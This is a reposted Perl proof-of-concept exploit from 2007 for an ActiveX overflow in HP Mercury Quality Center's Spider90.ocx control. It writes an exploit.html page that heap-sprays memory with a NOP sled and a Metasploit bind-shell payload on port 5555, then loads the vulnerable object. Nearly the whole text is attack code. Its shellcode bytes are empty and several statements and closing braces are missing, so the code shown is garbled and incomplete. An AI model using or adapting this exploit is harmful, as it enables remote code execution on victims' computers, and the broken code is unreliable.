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HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit
来源:www.vfocus.net 作者:Titon 发布时间:2007-04-05  
# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit
# Vulnerability found by Titon and Ri0t of Bastardlabs 

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =

my $jscript =
"<script>\n" .
"shellcode = unescape(\"" . convert_shellcode($shellcode) ."\");\n" .
"bigblock = unescape(\"\%u9090\%u9090\");\n" .
"headersize = 20;\n" .
"slackspace = headersize+shellcode.length;\n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" .
"memory = new Array();\n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;\n" .

my $header =
"<html>\n" .
"<head>\n" .
"</head>\n" .
$jscript .

my $footer =
"</body>\n" .

my $body =
"<OBJECT ID=\"MQC\" CLASSID=\"CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade\" CODEBASE=\"Spider90.ocx#Version=9,1,0,4353\" WIDTH=100\% HEIGHT=100\%>\n" .
"</object>\n" .
"</body>\n" .

my $page = "\xff\xfe"; # magic number of M$ unicode file
my $c;

foreach $c (split //, ($header)) {
$page = $page . $c . "\x00";

foreach $c (split //, ($body . $footer)) {
$page = $page . $c . "\x00";

open (IE, ">", "exploit.html");

print IE $page;

close IE;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
my $data = shift;
my $mode = shift() || 'LE';
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;

# Pad to an even number of bytes
if (length($data) % 2 != 0) {
$data .= substr($data, -1, 1);

while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
if ($mode eq 'LE') {
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
} else {
$code .= sprintf('%%u%.2x%.2x', $c1, $c2);
$idx += 2;

return $code;

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